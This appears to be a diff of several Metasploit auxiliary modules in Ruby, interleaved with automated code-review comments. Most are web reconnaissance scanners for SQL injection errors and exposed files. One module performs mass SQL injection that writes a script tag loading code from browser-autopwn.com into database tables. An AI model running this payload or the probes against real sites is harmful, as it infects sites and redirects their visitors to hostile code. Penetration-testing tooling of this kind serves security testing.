This module identifies the existence of Error Based SQL injection issues. Still requires alot of work
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('METHOD', [ true, "HTTP Method",'GET']),
@ -42,55 +42,55 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('DATA', [ false, "HTTP Body Data", '']),
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
], self.class)
register_advanced_options(
[
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
end
def run_host(ip)
gvars = nil
pvars = nil
cvars = nil
sqlinj = [
[ "'" ,'Single quote'],
[ "')",'Single quote and parenthesis'],
[ "\"",'Double quote'],
[ "#{rand(10)}'", 'Random value with single quote']
[ "#{rand(10)}'", 'Random value with single quote']
]
errorstr = [
["Unclosed quotation mark after the character string",'MSSQL','string'],
["Syntax error in string in query expression",'MSSQL','string'],
["Microsoft OLE DB Provider",'MSSQL','unknown'],
["You have an error in your SQL syntax",'MySQL','unknown'],
["java.sql.SQLException",'unknown','unknown']
["java.sql.SQLException",'unknown','unknown']
]
#
# Dealing with empty query/data and making them hashes.
#
if !datastore['QUERY'] or datastore['QUERY'].empty?
datastore['QUERY'] = nil
gvars = nil
else
gvars = queryparse(datastore['QUERY']) #Now its a Hash
end
if !datastore['DATA'] or datastore['DATA'].empty?
datastore['DATA'] = nil
pvars = nil
else
pvars = queryparse(datastore['DATA'])
end
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
datastore['COOKIE'] = nil
cvars = nil
@ -100,50 +100,50 @@ class Metasploit3 < Msf::Auxiliary
#
# Send normal request to check if error is generated
# Send normal request to check if error is generated
# (means the error is caused by other means)
#
#
begin
normalres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if !datastore['NoDetailMessages']
print_status("Normal request sent.")
print_status("Normal request sent.")
end
found = false
inje = nil
dbt = nil
injt = nil
if normalres
errorstr.each do |estr,dbtype,injtype|
if normalres.body.include? estr
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test")
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
print_error("[#{wmap_target_host}] Error string: '#{inje}'")
print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -151,64 +151,64 @@ class Metasploit3 < Msf::Auxiliary
:type => 'DATABASE_ERROR',
:data => "#{datastore['PATH']} Error: #{inje} DB: #{dbt}"
)
return
end
else
print_error("[#{wmap_target_host}] No response")
return
return
end
#
# Test URI Query parameters
#
found = false
if gvars
sqlinj.each do |istr,idesc|
if found
break
if found
break
end
gvars.each do |key,value|
gvars.each do |key,value|
gvars = queryparse(datastore['QUERY']) #Now its a Hash
gvars[key] = gvars[key]+istr
if !datastore['NoDetailMessages']
print_status("- Testing query with #{idesc}. Parameter #{key}:")
print_status("- Testing query with #{idesc}. Parameter #{key}:")
end
begin
testres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if testres
if testres
errorstr.each do |estr,dbtype,injtype|
if testres.body.include? estr
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{gvars[key]}")
print_status("[#{wmap_target_host}] Vuln query parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -216,40 +216,40 @@ class Metasploit3 < Msf::Auxiliary
:type => 'SQL_INJECTION',
:data => "#{datastore['PATH']} Location: QUERY Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
)
break
end
else
print_error("[#{wmap_target_host}] No response")
print_error("[#{wmap_target_host}] No response")
return
end
end
end
end
end
end
gvars = queryparse(datastore['QUERY'])
end
#
# Test DATA parameters
#
found = false
if pvars
sqlinj.each do |istr,idesc|
if found
break
if found
break
end
pvars.each do |key,value|
pvars.each do |key,value|
pvars = queryparse(datastore['DATA']) #Now its a Hash
if !datastore['NoDetailMessages']
print_status("- Testing data with #{idesc}. Parameter #{key}:")
print_status("- Testing data with #{idesc}. Parameter #{key}:")
end
pvars[key] = pvars[key]+istr
pvarstr = ""
pvars.each do |tkey,tvalue|
if pvarstr
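Review bot: Inside `pvars.each do |key,value|` the block reassigns `pvars = queryparse(datastore['DATA'])` on every iteration; the `each` keeps walking the original hash object so it behaves, but it reads as a bug, and the block parameter `value` is never used. Building the mutated copy in its own local, e.g. `test = queryparse(datastore['DATA'])` then `test[key] = test[key] + istr`, and iterating `pvars.each_key` would make the intent plain; the query- and cookie-parameter loops in this file have the same shape. The loop body continues into the next hunk.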
@ -257,19 +257,19 @@ class Metasploit3 < Msf::Auxiliary
end
pvarstr << tkey+'='+tvalue
end
begin
testres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => datastore['COOKIE'],
'data' => pvarstr
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if testres
@ -278,15 +278,15 @@ class Metasploit3 < Msf::Auxiliary
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Vuln data parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -294,39 +294,39 @@ class Metasploit3 < Msf::Auxiliary
:type => 'SQL_INJECTION',
:data => "#{datastore['PATH']} Location: DATA Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
)
break
end
else
print_error("[#{wmap_target_host}] No response")
print_error("[#{wmap_target_host}] No response")
return
end
end
end
end
end
end
end
#
# Test COOKIE parameters
#
found = false
if datastore['COOKIE']
sqlinj.each do |istr,idesc|
if found
break
if found
break
end
cvars.each do |key,value|
cvars.each do |key,value|
cvars = queryparse(datastore['COOKIE']) #Now its a Hash
if !datastore['NoDetailMessages']
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
print_status("- Testing cookie with #{idesc}. Parameter #{key}:")
end
cvars[key] = cvars[key]+istr
cvarstr = ""
cvars.each do |tkey,tvalue|
if cvarstr
@ -334,19 +334,19 @@ class Metasploit3 < Msf::Auxiliary
end
cvarstr << tkey+'='+tvalue
end
begin
testres = send_request_cgi({
'uri' => datastore['PATH'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => datastore['METHOD'],
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cvarstr,
'data' => datastore['DATA']
}, 20)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
if testres
@ -355,15 +355,15 @@ class Metasploit3 < Msf::Auxiliary
found = true
inje = estr
dbt = dbtype
injt = injtype
injt = injtype
end
end
if found
print_status("[#{wmap_target_host}] SQL Injection found. (#{idesc}) (#{datastore['PATH']})")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Error string: '#{inje}' Test Value: #{istr}")
print_status("[#{wmap_target_host}] Vuln cookie parameter: #{key} DB TYPE: #{dbt}, Error type '#{injt}'")
report_note(
:host => ip,
:proto => 'HTTP',
@ -371,15 +371,15 @@ class Metasploit3 < Msf::Auxiliary
:type => 'SQL_INJECTION',
:data => "#{datastore['PATH']} Location: COOKIE Parameter: #{key} Value: #{istr} Error: #{inje} DB: #{dbt}"
)
break
end
else
print_error("[#{wmap_target_host}] No response")
print_error("[#{wmap_target_host}] No response")
return
end
end
end
end
end
end
end
end
end
end


@ -1,6 +1,9 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,31 +21,31 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP File Same Name Directory Scanner',
'Description' => %q{
This module identifies the existence of files
in a given directory path named as the same name of the
This module identifies the existence of files
in a given directory path named as the same name of the
directory.
Only works if PATH is differenet than '/'.
Only works if PATH is differenet than '/'.
},
'Author' => [ 'et [at] metasploit.com' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The directory path to identify files", '/']),
OptString.new('EXT', [ true, "File extension to use", '.aspx'])
], self.class)
], self.class)
end
def run_host(ip)
extensions = [
'.null',
extensions = [
'.null',
'.backup',
'.bak',
'.c',
@ -53,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
'.html',
'.htm',
'.log',
'.old',
'.old',
'.orig',
'.tar',
'.tar.gz',
@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary
]
tpath = datastore['PATH']
if tpath.eql? "/"||""
print_error("Blank or default PATH set.");
return
end
if tpath[-1,1] != '/'
tpath += '/'
end
end
testf = tpath.split('/').last
extensions << datastore['EXT']
extensions.each { |ext|
begin
testfext = testf.chomp + ext
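Review bot: `if tpath.eql? "/"||""` parses as `tpath.eql?("/" || "")`, and `"/" || ""` is just `"/"`, so the blank-PATH case the message describes is never caught; `if tpath == "/" or tpath.empty?` (or `if ["/", ""].include?(tpath)`) is what was meant, and the trailing `;` after `print_error` is stray. The previous-directory scanner below has the identical line. `run_host` starts and ends outside the hunk.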
@ -89,9 +92,9 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain'
}, 20)
if (res and res.code >= 200 and res.code < 300)
if (res and res.code >= 200 and res.code < 300)
print_status("Found #{wmap_base_url}#{tpath}#{testfext}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -99,16 +102,16 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{tpath}#{testfext} Code: #{res.code}"
)
else
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
}
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -21,65 +21,65 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Interesting File Scanner',
'Description' => %q{
This module identifies the existence of interesting files
in a given directory path.
This module identifies the existence of interesting files
in a given directory path.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path to identify files", '/']),
OptString.new('EXT', [ false, "Append file extension to use", '']),
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_files.txt")
]
)
], self.class)
], self.class)
register_advanced_options(
[
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
),
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]),
OptInt.new('TestThreads', [ true, "Number of test threads", 25])
], self.class)
], self.class)
end
def run_host(ip)
conn = false
tpath = datastore['PATH']
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
nt = datastore['TestThreads'].to_i
nt = 1 if nt == 0
dm = datastore['NoDetailMessages']
queue = []
File.open(datastore['DICTIONARY']).each do |testf|
queue << testf.strip
end
end
#
# Detect error code
#
ecode = datastore['ErrorCode'].to_i
#
ecode = datastore['ErrorCode'].to_i
begin
randfile = Rex::Text.rand_text_alpha(5).chomp
res = send_request_cgi({
'uri' => tpath+randfile+ datastore['EXT'],
'method' => 'GET',
@ -87,8 +87,8 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
return if not res
tcode = res.code.to_i
tcode = res.code.to_i
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
@ -109,37 +109,37 @@ class Metasploit3 < Msf::Auxiliary
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
while(not queue.empty?)
t = []
1.upto(nt) do
1.upto(nt) do
t << Thread.new(queue.shift) do |testf|
Thread.current.kill if not testf
testfext = testf.chomp + datastore['EXT']
res = send_request_cgi({
'uri' => tpath+testfext,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
else
print_status("Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
report_note(
:host => ip,
:proto => 'HTTP',
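Review bot: `conn` is set to false in both `rescue` branches of the error-code probe but is never consulted before `while(not queue.empty?)`, so after a refused or timed-out connection the loop still spawns `nt` threads whose `send_request_cgi` sits outside any `begin`/`rescue` and fails as a thread exception instead of a clean return. Initialising `conn = true` (the assignment is in the previous hunk) and adding `return if not conn` after the rescue block, as the copy-file scanner does, closes this; the `print_status("NOT Found ...")` line also has the nil-`res` dereference raised on the copy-file scanner. The `while` loop and the thread block continue past the end of the hunk, so a later check is possible but not visible.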
@ -147,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{tpath}#{testfext} Code: #{res.code}"
)
end
end
end
end
end


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -45,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
end
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
connect
sock.put("GET /_vti_inf.html HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + "Keep-Alive: 300\r\n" +
@ -77,27 +81,27 @@ class Metasploit3 < Msf::Auxiliary
def check_account(info, fpversion, target_host)
return if not fpversion
return if not fpversion
connect
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
# http://msdn2.microsoft.com/en-us/library/ms454298.aspx
method = "method=open+service:#{fpversion}&service_name=/"
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" +
"Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" +
"User-Agent: " + datastore['UserAgent'] + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" +
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
"Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n"
sock.put(req)
res = sock.get_once
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
retcode = $1
retmsg = $2.strip
if(retcode == "100")
res = sock.get_once
if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/))
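Review bot: `check_account` calls `connect` on its third line and the matching `disconnect` only at the very end of the method (in the next hunk), with nothing in between protected by `ensure`, so any exception from `sock.put` or `sock.get_once` leaves the socket open. Wrapping everything after `connect` in `begin ... ensure disconnect end` fixes that. The `$1`/`$2` captures from `res.match` would be clearer as locals taken from `Regexp.last_match` or a named-capture regex; style only.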
@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{info} FrontPage Unknown Response [#{retcode}]")
end
end
disconnect
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -22,17 +22,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection',
'Description' => %q{
This module implements the mass SQL injection attack in
This module implements the mass SQL injection attack in
use lately by concatenation of HTML string that forces a persistant
XSS attack to redirect user browser to a attacker controller website.
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']),
@ -40,17 +40,17 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']),
OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]),
OptBool.new('COMMENTED', [ true, "Comment end of query", true]),
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
], self.class)
OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']),
], self.class)
end
def wmap_enabled
false
end
end
def run_host(ip)
#Weird to indent for practical reasons.
infstr = %Q{
DECLARE @T varchar(255),@C varchar(255)
@ -71,36 +71,36 @@ DECLARE @T varchar(255),@C varchar(255)
prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST("
poststr = " AS NVARCHAR(4000));EXEC(@S);"
gvars = queryparse(datastore['QUERY']) #Now its a Hash
if gvars.has_key?(datastore['VULN_PAR'])
prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : nil
poststr = datastore['COMMENTED'] ? "#{poststr}--" : nil
attstr = ""
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
attstr = ""
infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" }
gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr
else
else
print_status("Error: Vulnerable parameter is not part of the supplied query string.")
return
end
begin
normalres = send_request_cgi({
'uri' => datastore['URI'],
'vars_get' => gvars,
'vars_get' => gvars,
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
rescue ::Errno::EPIPE
end
print_status("Request sent.")
print_status("Request sent.")
end
end


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,27 +21,27 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP Previous Directory File Scanner',
'Description' => %q{
This module identifies files in the first parent directory with same name as
the given directory path. Example: Test /backup/files/ will look for the
following files /backup/files.ext .
following files /backup/files.ext .
},
'Author' => [ 'et [at] metasploit.com' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The test path. The default value will not work.", '/'])
], self.class)
], self.class)
end
def run_host(ip)
extensions = [
'.null',
extensions = [
'.null',
'.backup',
'.bak',
'.c',
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
'.htm',
'.jar',
'.log',
'.old',
'.old',
'.orig',
'.o',
'.tar',
@ -63,18 +67,18 @@ class Metasploit3 < Msf::Auxiliary
]
tpath = datastore['PATH']
if tpath.eql? "/"||""
print_error("Blank or default PATH set.");
return
end
if tpath[-1,1] != '/'
tpath += '/'
end
end
extensions << datastore['EXT']
extensions.each { |ext|
begin
testf = tpath.chop+ext
@ -85,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain'
}, 20)
if (res and res.code >= 200 and res.code < 300)
if (res and res.code >= 200 and res.code < 300)
print_status("Found #{wmap_base_url}#{testf}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -95,16 +99,16 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{testf} Code: #{res.code}"
)
else
print_status("NOT Found #{wmap_base_url}#{testf}")
print_status("NOT Found #{wmap_base_url}#{testf}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
}
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -23,42 +23,42 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HTTP File Extension Scanner',
'Description' => %q{
This module identifies the existence of additional files
This module identifies the existence of additional files
by modifying the extension of an existing file.
},
'Author' => [ 'et [at] cyberspace.org' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('PATH', [ true, "The path/file to identify additional files", '/default.asp']),
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']),
], self.class)
register_advanced_options(
[
OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]),
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
),
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
], self.class)
end
def run_host(ip)
conn = false
dm = datastore['NoDetailMessages']
extensions= [
'bak',
'txt',
@ -72,19 +72,19 @@ class Metasploit3 < Msf::Auxiliary
tpathfile = Pathname.new(datastore['PATH'])
tpathnoext = tpathfile.to_s[0..datastore['PATH'].rindex(tpathfile.extname)]
extensions.each { |testext|
#
# Detect error code. This module is a special case as each extension
# usually is handled diferently by the server with different error codes
#
ecode = datastore['ErrorCode'].to_i
# usually is handled diferently by the server with different error codes
#
ecode = datastore['ErrorCode'].to_i
begin
randchars = Rex::Text.rand_text_alpha(3).chomp
tpath = tpathnoext+randchars+testext
res = send_request_cgi({
'uri' => tpath,
'method' => 'GET',
@ -92,14 +92,14 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
return if not res
tcode = res.code.to_i
tcode = res.code.to_i
emesg = ""
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
File.open(datastore['HTTP404Sigs']).each do |str|
if(res.body.index(str))
emesg = str
@ -117,14 +117,14 @@ class Metasploit3 < Msf::Auxiliary
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
#if not conn return
begin
tpath = tpathnoext+testext
res = send_request_cgi({
@ -132,18 +132,18 @@ class Metasploit3 < Msf::Auxiliary
'method' => 'GET',
'ctype' => 'text/plain'
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
if res.code.to_i == 400 and ecode != 400
print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}")
else
print_status("Found #{wmap_base_url}#{tpath}")
report_note(
:host => ip,
:proto => 'HTTP',
@ -151,14 +151,14 @@ class Metasploit3 < Msf::Auxiliary
:type => 'FILE',
:data => "#{tpath} Code: #{res.code}"
)
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
rescue ::Timeout::Error, ::Errno::EPIPE
end
}
end
end
